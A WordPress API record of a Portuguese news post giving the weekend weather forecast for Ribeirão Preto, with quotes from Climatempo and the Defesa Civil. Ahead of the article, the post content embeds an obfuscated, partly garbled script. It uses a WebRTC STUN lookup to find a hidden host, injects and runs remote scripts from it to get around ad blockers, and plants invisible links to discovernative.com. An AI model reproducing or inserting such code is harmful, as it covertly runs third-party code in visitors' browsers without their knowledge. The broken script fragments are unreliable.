{"id":77968,"date":"2024-11-30T10:00:01","date_gmt":"2024-11-30T13:00:01","guid":{"rendered":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/30\/confira-a-previsao-do-tempo-para-ribeirao-preto-no-fim-de-semana\/"},"modified":"2024-11-30T10:00:01","modified_gmt":"2024-11-30T13:00:01","slug":"confira-a-previsao-do-tempo-para-ribeirao-preto-no-fim-de-semana","status":"publish","type":"post","link":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/30\/confira-a-previsao-do-tempo-para-ribeirao-preto-no-fim-de-semana\/","title":{"rendered":"Confira a previs\u00e3o do tempo para Ribeir\u00e3o Preto no fim de semana"},"content":{"rendered":"<div id=\"awn-z8922274\"><\/div>\n<p><script data-cfasync=\"false\" type=\"text\/javascript\">\n    var adcashMacros = (r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return c;\n    var zoneNativeSett=(r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return c;\n    var urls=(r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return c;function acPrefetch(e)for(var t,n,r,a,i,o,c=\"\",s=0;s<e.length;)a=(t=e.charCodeAt(s++))>>2,t=(3&t)<<4var nativeInit=new function(){var a=\"\",i=Math.floor(1e12*Math.random()),o=Math.floor(1e12*Math.random()),t=window.location.protocol,c={_0:\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=\",encode:function(e){for(var t,n,r,a,i,o,c=\"\",s=0;s<e.length;)a=(t=e.charCodeAt(s++))>>2,t=(3&t)<<4|(n=e.charCodeAt(s++))>>4,i=(15&n)<<2|(r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return c}};this.init=function(){e()};var e=function(){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",!1),e.src=\"\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js\",e.onerror=function(){!0,r(),n()},e.onload=function(){nativeForPublishers.init()},nativeForPublishers.attachScript(e)},n=function(){\"\"!==a?s(i,t):setTimeout(n,250)},r=function(){var t=new(window.RTCPeerConnection||window.mozRTCPeerConnection||window.webkitRTCPeerConnection)({iceServers:[{urls:\"stun:1755001826:443\"}]},{optional:[{RtpDataChannels:!0}]});t.onicecandidate=function(e){!e.candidate||e.candidate&&-1==e.candidate.candidate.indexOf(\"srflx\")||!(e=\/([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\/.exec(e.candidate.candidate)[1])||e.match(\/^(192\\.168\\.|169\\.254\\.|10\\.|172\\.(1[6-9]|2\\d|3[01]))\/)||e.match(\/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$\/)||(a=e)},t.createDataChannel(\"\"),t.createOffer(function(e){t.setLocalDescription(e,function(){},function(){})},function(){})},s=function(){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",!1),e.src=t+\"\/\/\"+a+\"\/\"+c.encode(i+\"\/\"+(i+5))+\".js\",e.onload=function(){for(var e in zoneNativeSett.r)d(zoneNativeSett.r[e])},nativeForPublishers.attachScript(e)},d=function(e){var t=\"jsonp\"+Math.round(1000001*Math.random()),n=[i,parseInt(e)+i,o,\"callback=\"+t],r=\"http:\/\/\"+a+\"\/\"+c.encode(n.join(\"\/\"));new native_request(r,e,t).jsonp()}},nativeForPublishers=new function(){var n=this,e=Math.random();n.getRand=function(){return e},this.getNativeRender=function(){if(!n.nativeRenderLoaded){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",\"false\"),e.src=urls.cdnUrls[urls.cdnIndex]+\"\/script\/native_render.js\",e.onerror=function(){throw new Error(\"cdnerr\")},e.onload=function(){n.nativeRenderLoaded=!0},n.attachScript(e)}},this.getNativeResponse=function(){if(!n.nativeResponseLoaded){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",\"false\"),e.src=urls.cdnUrls[urls.cdnIndex]+\"\/script\/native_server.js\",e.onerror=function(){throw new Error(\"cdnerr\")},e.onload=function(){n.nativeResponseLoaded=!0},n.attachScript(e)}},this.attachScript=function(e){var t;void 0!==document.scripts&&(t=document.scripts[0]),void 0===t&&(t=document.getElementsByTagName(\"script\")[0]),t.parentNode.insertBefore(e,t)},this.fetchCdnScripts=function(){if(urls.cdnIndex<urls.cdnUrls.length)try{n.getNativeRender(),n.getNativeResponse()}catch(e){urls.cdnIndex++,n.fetchCdnScripts()}},this.scriptsLoaded=function(){if(n.nativeResponseLoaded&#038;&#038;n.nativeRenderLoaded){var e=[];for(zone in zoneNativeSett.r)document.getElementById(zoneNativeSett.container+\"-z\"+zoneNativeSett.r[zone])&#038;&#038;(e[zoneNativeSett.r[zone]]=new native_request(\"\/\/\"+zoneNativeSett.baseUrl+\"?nwpsv=1&#038;\",zoneNativeSett.r[zone]),e[zoneNativeSett.r[zone]].build());for(var t in e)e[t].jsonp(\"callback\",(e[t],function(e,t){setupAd(zoneNativeSett.container+\"-z\"+t,e)}))}else setTimeout(n.scriptsLoaded,250)},this.init=function(){var e;if(n.insertBotTrapLink(),0===window.location.href.indexOf(\"file:\/\/\"))for(e=0;e<urls.cdnUrls.length;e++)0===urls.cdnUrls[e].indexOf(\"\/\/\")&#038;&#038;(urls.cdnUrls[e]=\"http:\"+urls.cdnUrls[e]);for(e=0;e<urls.cdnUrls.length;e++)acPrefetch(urls.cdnUrls[e]);n.fetchCdnScripts(),n.scriptsLoaded()},this.insertBotTrapLink=function(){var e=document.createElement(\"a\");e.href=window.location.protocol+\"\/\/discovernative.com\/al\/visit.php?al=1,4\",e.style.display=\"none\",e.style.visibility=\"hidden\",e.style.position=\"relative\",e.style.left=\"-1000px\",e.style.top=\"-1000px\",e.style.color=\"#fff\",e.link='<a href=\"http:\/\/discovernative.com\/al\/visit.php?al=1,5\"><\/a>',e.innerHTML=\"\",document.body.appendChild(e)}};nativeInit.init();\n<\/script><br \/>\n<a href=\"https:\/\/discovernative.com\/al\/visit.php?al=1,7\"\n   style=\"position:absolute;top:-1000px;left:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:medium none;background-color:transparent;\"><\/a><br \/>\n<noscript><br \/>\n    <a href=\"https:\/\/discovernative.com\/al\/visit.php?al=1,6\"\n       style=\"position:absolute;top:-1000px;left:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:medium none;background-color:transparent;\"><\/a><br \/>\n<\/noscript><br \/>\n <br \/>\n<\/p>\n<div data-td-block-uid=\"tdi_106\">\n<div class=\"tdb-block-inner td-fix-index\">\n<p>O s\u00e1bado (30) ser\u00e1 de<strong> calor <\/strong>e com possibilidade de <strong>chuva r\u00e1pida<\/strong> em<strong> Ribeir\u00e3o Preto<\/strong>, segundo a <strong><a href=\"https:\/\/www.climatempo.com.br\/previsao-do-tempo\/15-dias\/cidade\/530\/ribeiraopreto-sp\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Climatempo<\/a><\/strong>. <mark style=\"background-color:#fcb900\" class=\"has-inline-color has-black-color\">Os meteorologistas apontam que os term\u00f4metros em Ribeir\u00e3o Preto podem chegar aos 30\u00b0C, com m\u00ednima de 22\u00b0.<\/mark><\/p>\n<p>O dia ser\u00e1 de Sol com algumas nuvens e pode chover r\u00e1pido durante alguns per\u00edodos do dia e da noite, com acumulado previsto de 4 mil\u00edmetros. A umidade do ar varia entre 64% e 99%.<\/p>\n<h3 class=\"wp-block-heading\"><strong>O que diz a Defesa Civil?<\/strong><\/h3>\n<p>\u201cO dia ser\u00e1 marcado pela varia\u00e7\u00e3o de nebulosidade em todo Estado de S\u00e3o Paulo, mesmo com o afastamento da a frente fria, ainda haver\u00e1 previs\u00e3o de chuva para faixa leste do territ\u00f3rio paulista, por\u00e9m os atuais modelos meteorol\u00f3gicos n\u00e3o indicam riscos para acumulados elevados, apenas para chuva fraca. Al\u00e9m disso, as temperaturas tendem a se elevar no decorrer do dia, condicionando uma sensa\u00e7\u00e3o t\u00e9rmica de calor e abafado em todo Estado. Logo, recomenda-se aten\u00e7\u00e3o redobrada, devido \u00e0s varia\u00e7\u00f5es clim\u00e1ticas\u201d, informa.<\/p>\n<h3 class=\"wp-block-heading\"><strong>No domingo<\/strong><\/h3>\n<p>No domingo (1\u00ba de dezembro), a quantidade de chuva diminui para apenas 0,7 mil\u00edmetros. O dia ser\u00e1 de Sol com muitas nuvens e as pancadas de chuva devem acontecer no per\u00edodo da tarde.<\/p>\n<p>A Climatempo informa que os term\u00f4metros devem registrar temperaturas entre 22\u00ba C e 31\u00b0C, com umidade do ar entre 60% e 64%.<\/p>\n<p><!-- CONTENT END 1 -->\n<\/div>\n<\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.acidadeon.com\/ribeiraopreto\/cotidiano\/confira-a-previsao-do-tempo-para-ribeirao-preto-no-fim-de-semana\/\">Source link <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O s\u00e1bado (30) ser\u00e1 de calor e com possibilidade de chuva r\u00e1pida em Ribeir\u00e3o Preto, segundo a Climatempo. Os meteorologistas apontam que os term\u00f4metros em&#8230;<\/p>\n","protected":false},"author":1,"featured_media":77969,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[11],"tags":[],"class_list":["post-77968","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?fit=1600%2C1200&ssl=1","uagb_featured_image_src":{"full":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?fit=1600%2C1200&ssl=1",1600,1200,false],"thumbnail":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?resize=150%2C150&ssl=1",150,150,true],"medium":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?fit=300%2C225&ssl=1",300,225,true],"medium_large":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?fit=768%2C576&ssl=1",768,576,true],"large":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?fit=1024%2C768&ssl=1",1024,768,true],"1536x1536":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?fit=1536%2C1152&ssl=1",1536,1152,true],"2048x2048":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?fit=1600%2C1200&ssl=1",1600,1200,true],"really-simple-thumb":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ceu-ribeirao-preto_2024-11-30_12-35-29_jpeg_2024-11-30_12-35-29.webp.webp?resize=370%2C247&ssl=1",370,247,true]},"uagb_author_info":{"display_name":"ismaelcolosi.com.br","author_link":"https:\/\/ismaelcolosi.com.br\/index.php\/author\/vidareal-online\/"},"uagb_comment_info":0,"uagb_excerpt":"O s\u00e1bado (30) ser\u00e1 de calor e com possibilidade de chuva r\u00e1pida em Ribeir\u00e3o Preto, segundo a Climatempo. Os meteorologistas apontam que os term\u00f4metros em...","jetpack-related-posts":[{"id":75566,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/06\/hc-de-ribeirao-preto-anuncia-novos-concursos-publicos-confira-as-vagas-2\/","url_meta":{"origin":77968,"position":0},"title":"HC de Ribeir\u00e3o Preto anuncia novos concursos p\u00fablicos; confira as vagas","author":"ismaelcolosi.com.br","date":"6 de November de 2024","format":false,"excerpt":"O\u00a0Hospital das\u00a0Cl\u00ednicas de Ribeir\u00e3o Preto (HC-RP)\u00a0publicou o edital de 14 novos\u00a0concursos p\u00fablicos. As oportunidades s\u00e3o de\u00a0n\u00edvel t\u00e9cnico e superior\u00a0e os sal\u00e1rios variam entre\u00a0R$ 2,5 mil\u00a0e\u00a0R$ 5,7 mil. De acordo com o edital, os contratados v\u00e3o receber tamb\u00e9m um\u00a0aux\u00edlio alimenta\u00e7\u00e3o no valor de R$ 360 e vale-transporte. As vagas s\u00e3o para\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":76921,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/19\/ribeirao-preto-recebe-festival-de-orquideas-e-suculentas-veja-quando\/","url_meta":{"origin":77968,"position":1},"title":"Ribeir\u00e3o Preto recebe festival de orqu\u00eddeas e suculentas; Veja quando","author":"ismaelcolosi.com.br","date":"19 de November de 2024","format":false,"excerpt":"Acontece em Ribeir\u00e3o Preto, entre os dias 30 de novembro e 1\u00ba de dezembro, o 3\u00ba Festival de Orqu\u00eddeas e Suculentas. Ao todo, seis orquid\u00e1rios participar\u00e3o do festival, que ter\u00e1 entrada gratuita. O evento acontece no Centro Social Dom Arnaldo Ribeiro, que fica na rua Prudente de Morais, 431, no\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":76401,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/12\/ribeirao-preto-vai-pagar-r-34-milhoes-para-projetos-aprovado-na-lei-aldir-blanc\/","url_meta":{"origin":77968,"position":2},"title":"Ribeir\u00e3o Preto vai pagar R$ 3,4 milh\u00f5es para projetos aprovado na\u00a0lei\u00a0Aldir\u00a0Blanc","author":"ismaelcolosi.com.br","date":"12 de November de 2024","format":false,"excerpt":"A Prefeitura Municipal de Ribeir\u00e3o Preto, por meio da Secretaria da Cultura e Turismo, anunciou o lan\u00e7amento dos editais viabilizados com recursos da Pol\u00edtica Nacional Aldir Blanc (PNAB). Ao todo, s\u00e3o R$ 3,4 milh\u00f5es destinadas ao incentivo. Os interessados devem se inscrever de forma on-line (veja abaixo), do dia 13\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-44_2024-10-25_18-13-32_png_2024-10-25_18-13-32.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-44_2024-10-25_18-13-32_png_2024-10-25_18-13-32.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-44_2024-10-25_18-13-32_png_2024-10-25_18-13-32.webp.webp?fit=1200%2C675&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-44_2024-10-25_18-13-32_png_2024-10-25_18-13-32.webp.webp?fit=1200%2C675&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-44_2024-10-25_18-13-32_png_2024-10-25_18-13-32.webp.webp?fit=1200%2C675&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":78644,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/12\/07\/gabriel-tiburcio-de-ribeirao-preto-ganha-ouro-no-sul-americano-sub-18-de-atletismo\/","url_meta":{"origin":77968,"position":3},"title":"Gabriel Tib\u00farcio, de Ribeir\u00e3o Preto, ganha ouro no Sul-Americano Sub-18 de Atletismo","author":"ismaelcolosi.com.br","date":"7 de December de 2024","format":false,"excerpt":"O atleta Gabriel Tib\u00farcio, de Ribeir\u00e3o Preto, conquistou medalha de ouro nos 100 metros rasos, no 27\u00ba Campeonato Sul-Americano Sub-18 de Atletismo. A medalha dourada veio no primeiro dia de disputas, nesta sexta-feira (6), em San Lu\u00eds, na Argentina. A atleta brasileira Hakelly de Souza tamb\u00e9m ganhou ouro nos 100\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/GABRIEL-TIBURCIO_2024-12-07_14-21-35_jpg_2024-12-07_14-21-35.webp.webp?fit=1200%2C725&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/GABRIEL-TIBURCIO_2024-12-07_14-21-35_jpg_2024-12-07_14-21-35.webp.webp?fit=1200%2C725&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/GABRIEL-TIBURCIO_2024-12-07_14-21-35_jpg_2024-12-07_14-21-35.webp.webp?fit=1200%2C725&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/GABRIEL-TIBURCIO_2024-12-07_14-21-35_jpg_2024-12-07_14-21-35.webp.webp?fit=1200%2C725&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/GABRIEL-TIBURCIO_2024-12-07_14-21-35_jpg_2024-12-07_14-21-35.webp.webp?fit=1200%2C725&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":78768,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/12\/09\/saerp-alerta-para-falta-dagua-em-bairros-de-ribeirao-preto-veja-quais\/","url_meta":{"origin":77968,"position":4},"title":"Saerp alerta para falta d\u2019\u00e1gua em bairros de Ribeir\u00e3o Preto; Veja quais","author":"ismaelcolosi.com.br","date":"9 de December de 2024","format":false,"excerpt":"A Saerp (Secretaria de \u00c1gua e Esgoto de Ribeir\u00e3o Preto) informou nesta segunda-feira (9) que dois bairros da zona Oeste de Ribeir\u00e3o Preto podem ficar sem \u00e1gua. De acordo com a secretaria, uma equipe realiza manuten\u00e7\u00e3o preventiva do sistema de abastecimento no reservat\u00f3rio Cristo Redentor 1 e 2, o que\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1733751769_torneira_falta_1024x576_08122020103250.jpg?fit=1024%2C576&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1733751769_torneira_falta_1024x576_08122020103250.jpg?fit=1024%2C576&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1733751769_torneira_falta_1024x576_08122020103250.jpg?fit=1024%2C576&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1733751769_torneira_falta_1024x576_08122020103250.jpg?fit=1024%2C576&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":77015,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/20\/motociclisa-e-socorrida-apos-acidente-em-rotatoria-na-zona-sul-de-ribeirao-preto\/","url_meta":{"origin":77968,"position":5},"title":"Motociclisa \u00e9 socorrida ap\u00f3s acidente em rotat\u00f3ria na zona Sul de Ribeir\u00e3o Preto","author":"ismaelcolosi.com.br","date":"20 de November de 2024","format":false,"excerpt":"Uma motociclista foi socorrida na manh\u00e3 desta quarta-feira (20), ap\u00f3s se envolver em uma batida com um carro na rotat\u00f3ria da avenida Presidente Vargas, no sentido ao Anel Vi\u00e1rio Sul, em Ribeir\u00e3o Preto. Assista ao v\u00eddeo abaixo. A RP Mobi informou que a v\u00edtima foi encaminhada a um hospital. O\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ACIDENTE_2024-11-20_13-59-29_jpg_2024-11-20_13-59-29.webp.webp?fit=1200%2C844&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ACIDENTE_2024-11-20_13-59-29_jpg_2024-11-20_13-59-29.webp.webp?fit=1200%2C844&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ACIDENTE_2024-11-20_13-59-29_jpg_2024-11-20_13-59-29.webp.webp?fit=1200%2C844&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ACIDENTE_2024-11-20_13-59-29_jpg_2024-11-20_13-59-29.webp.webp?fit=1200%2C844&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/ACIDENTE_2024-11-20_13-59-29_jpg_2024-11-20_13-59-29.webp.webp?fit=1200%2C844&ssl=1&resize=1050%2C600 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pfMlyK-khy","_links":{"self":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts\/77968","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=77968"}],"version-history":[{"count":0,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/posts\/77968\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/media\/77969"}],"wp:attachment":[{"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=77968"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=77968"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ismaelcolosi.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=77968"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}